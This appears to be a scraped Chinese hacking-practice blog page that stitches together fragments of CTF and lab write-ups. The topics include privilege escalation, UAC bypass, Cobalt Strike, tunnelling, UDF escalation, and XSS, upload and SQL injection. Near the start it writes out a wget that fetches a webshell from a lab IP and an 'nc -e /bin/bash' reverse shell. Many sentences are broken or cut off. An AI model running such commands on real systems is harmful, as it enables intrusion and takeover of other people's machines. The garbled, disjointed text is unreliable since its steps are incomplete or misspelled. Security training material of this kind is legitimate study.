helloKittywz的博客

使用命令：wget http://192.168.163.131:8889/webshell.phpnc -e /bin/bash 192.168.163.131 8888稍微改一下。

joomscan是一款开源的且针对joomla的扫描器，kali可以用命令apt install joomscan安装该工具kali自带的漏洞库：找文件的命令 find / -name *falg*john的密码暴力破解以及破解成功存放的位置/root/.john/john.pot文件巩固了交互shell ：​​​​​​​。

然后我们在把BOSS加入子域控里面去，这样DC不能直接控制，但是可以通过控制web来进行控制。直接到安装 当你们遇见先决条件检查不通过的时候，你可以使用下面的命令。web也是类似的，下面操作都是类似的，创建一个账号，然后加入就行了。然后在更改密码，但是有时候还是不能通过，你就换一个机器。备选的dns才是dc的，要不然子域控配置不了。下面都是一样的跟配置上面的DC是一样的。然后就加入域环境里面去。

这次打靶机学到了bash逃逸，以及我们在爆破的时候可以根据网站来爬取密码和账号，这点也是我的收获。也复习了一些git提权吧，继续干干干！compgen -c 如果我们可以直接使用cp命令我们可以直接直接复制到本地用户目录。然后我们收集到的密码，然后我们在去收集账号。像上面一样来进行逃逸的，这样来进行逃逸的。然后我们就使用来查看我们可以使用的命令。使用wpsan来根据网站来获取账号。意思是我们要登录到jerry的用户。还可以使用另外的工具来进行操作。下面有提示 rbash。

第一次打这样的靶机，还是挺舒服的，liunx提权以前就知道，也没有实操过，实操和看视频完全是2个样子，我也是完整的进行了一次渗透吧，继续加油。干就完了！！！！

我们还是照样生成msf的后面文件，然后我们在绕过uac的时候，前面讲的是使用msf内置模块，但是那个绕过的成功率比较低，我们使用这个项目成功率大大的提高。然后我们先来进行操作，我们是这样来上线的，我们要使用spp这个工具，个人感觉安装比pingtunnel感觉要简单一点。我们客户端要用spp，服务器也要有spp，下面我们来演示怎么构建的，以及我是这么确定是走的icmp而不是其他的协议。开启过后，我们在创建我们先开始说的2个监听器。然后我们要准备2个cs的监听器，一个是本地的，一个是cs服务端的。

我们在进行内网渗透的时候，第一步要解决的就是网的问题，网络我们都不通或者我们都不能进行访问怎么能进行后门的渗透。这的图非常的简单，也没有waf等阻碍，我们的目的就是攻击机器可以对web进行渗透，我们怎么办，我们来看看图，DHCP是有网络的，意思是它可以上网，所以我们先拿下DHCP的权限，通过DHCP去访问web。我们就要建立代理，我们不可能把渗透攻击全部上传到DHCP上面去，我们要让web通过CS来进行上线的操作，而且我们也访问不到web创建的页面(虽然我这没有)，但是建立了代理我们就可以访问了。

第四：我们在使用的时候可能是cs版本不对，我的是4.8然后没成功，后面换成4.7就过了这点也可以是失败点的问题。我们要在cs客户端配置监听器，这个liunx上线只能是https的监听器，我们来看看操作。我的是kali为cs的服务端 然后我的win10为cs的客户端来进行操作。首先下载配置文件，然后我们是服务端是什么系统我们就下载什么系统来进行操作。也是生成成功了，我们在当前的目录找出来然后给他赋予权限，在进行执行就行了。一个是我们在kail上面的地址 一个是我们的系统。第一：路径不要选择错误了。

现在我们来说说liunx提权的操作：前面我们说了环境变量，定时任务来进行提权的操作我们先来说说什么是rsyncrsync是数据备份工具，默认是开启的873端口我们是使用docker下载镜像文件，什么镜像文件是不重要的，然后将root目录挂载到mnt容器中然后我们就可以在mnt目录中看见与root是一样文件了，你在外部看这个目录是空的。在这里面进行相对应的操作。sudoedit -s / 像下面的这样的话就说明是没有漏洞的如果不是这样的就说明是存在这个漏洞的。我们也可以直接看版本来确定有没有漏洞然后我

tar czf a.tar * 这个是在进行打包文件 *打包所以的文件 a.tar打包文件的名字。主要我们普通的用户都可以编辑计时任务，我们写一个反弹shehll进去，这样就可以获取管理员的权限。这个就是管理员在配置计时任务的时候权限没有控制好，也就是任意的人都可以编辑计时任务。

现在开始学习内网的相关的知识了，我们在拿下web权限过后，我们要看自己拿下的是什么权限，可能是普通的用户权限，这个连添加用户都不可以，这个时候我们就要进行权限提升操作了。权限提升这点与我们后门进行内网渗透是乘上启下的，没有权限进行什么的操作都比较难进行。

上面我们简单的说了一下绕过uac，但是我们使用的msf模块ask要对方管理员跟我们一起来进行操作，才可以进行提权的操作，这点就限制住了我们。我们今天来讲一下不用钓鱼的绕过的操作。

我们先来说说uac是什么东西，uac其实说简单一点，就是你要运行某个程序的时候弹出的是与否uac是用户控制的我们怎么来看uac在cmd中输入msconfig进入然后我们进行普通的提权的时候是不能超过的，下面我们来看看不超过的样子。

我们的udf提权和反弹shell提权是类似的，反弹shell就是直接执行命令来建立这些操作，命令是写好了的通过编码进行操作的，也是创建dll文件。与udf提权是类似的。在实际的提权操作还有很多妨碍我们的，我们会遇见很多的，导致提权不成功的操作。mysql的udf提权前提：1：要有数据库密码和账号2：secure-file-priv=空或者写入的路径各个好是我们要写的地方。

在漏洞复现的时候做了一道类似的，然后我们就要去了解什么是war包，然后这个漏洞实现要有什么情况？？为什么要进行部署？？war包在哪些地方可以实现？？？war是一种java web应用程序打包格式，是把java web应用的相关文件打包成一个单独的文件，war包含了web应用程序的静态资源文件(html，css，js)和服务器java类文件(jsp,servlet)，配置文件以及其他必要的文件。war是为了方便开发人员轻松把应用程序部署到服务器上，不用手动复制和配置每一个文件。

然后我们可以看看index.php来看这个题是过滤了哪些东西，进行总结，也了解了解。先开始我读取index.php这个文件就不能进行读取，我还以为语法出现了错误。到时候在来看看，看看\这个转义特殊字符的，也就是进行强制转换的。也就是上一条的命令的输出结果作为下一条命令的输入。分析一下过滤哪些东西，在源码中可以明确的看出，，也就是说我们要进行绕过，然后我们使用。不行的时候在试试看。直接去看看flag可以读取不？flag所以知道了flag被过滤了。ls来看看，我们来看看有哪些文件。的那篇博客中，然后我们进行。

我们现在来说说这2个之间的关系，因为昨天的我也没有弄清楚这2者的关系，总感觉迷迷糊糊的。xss这个漏洞是大家并不怎么陌生，导致xss漏洞的产生是服务器没有对用户提交数据过滤不严格，导致浏览器把用户输入的当作js代码返回客户端进行执行，这样就导致了攻击。xss(跨站脚本攻击)可以说简单一点前端js代码可以干什么我们就可以干什么，我们可以获取到用户的cookie，获取键盘记录，钓鱼等等的操作我们来说说csrf这个漏洞csrf(跨站请求伪造)这个是利用用户的。

还是半夜睡不着，打开靶机开始操作。今天看了文件下载和目录穿越漏洞想结合以及防御方法。半夜来进行操作一波。复现一下漏洞开始操作起来！！！进入到页面，开始找细节，然后看了前面的提示操作，我前面也是以为要使用contentbases这个参数来进行访问。没有找到我想要的东西然后加上我前面说的那个参数没有找到的操作？？？？我就在仔细去看，是要使用什么rpc/set_all发送带../序列的那个参数来进行操作的然后我去百度知道了rpc这个是远程过程调用的协议。说简单一点就是可以进行远程访问的操作。

半夜睡不着起来做做文件上传，在半夜还是收获了一些，首先看看buuctf的1这个题，前面直接登录就行了。文件上传真的难上传！！！进去过后就是正常的文件上传的操作，但是它也提示，只能上传png格式的图片。然后抓包进行操作，进行各种各样的绕过，我以为它是我上传正常的png格式的图片还是对我说请上传png图片，我就有点疑惑了，正常的图片怎么也是这样，那它对哪进行了检查，我试了很多中方法，前面我一来我就用了那个数据流::$data这个来进行处理的操作，然后我重新看了一下靶机时间。

看到了数据库我们在看表，还是一样的加参数 -tables。前面都是get型的注入，我们现在来看看post的sql注入。我在经过简单的尝试过后，也成功的登录了，看看我下面的。sqlamp中加上参数-r “路径”来进行注入。的，看能不能来进行登录，这点就需要我们来进行。post的sql注入的话，我们在看见了。，这点跟get注入不一样。相结合来进行操作，然后把。放到一个记事本中，然后在。post的话我们要跟。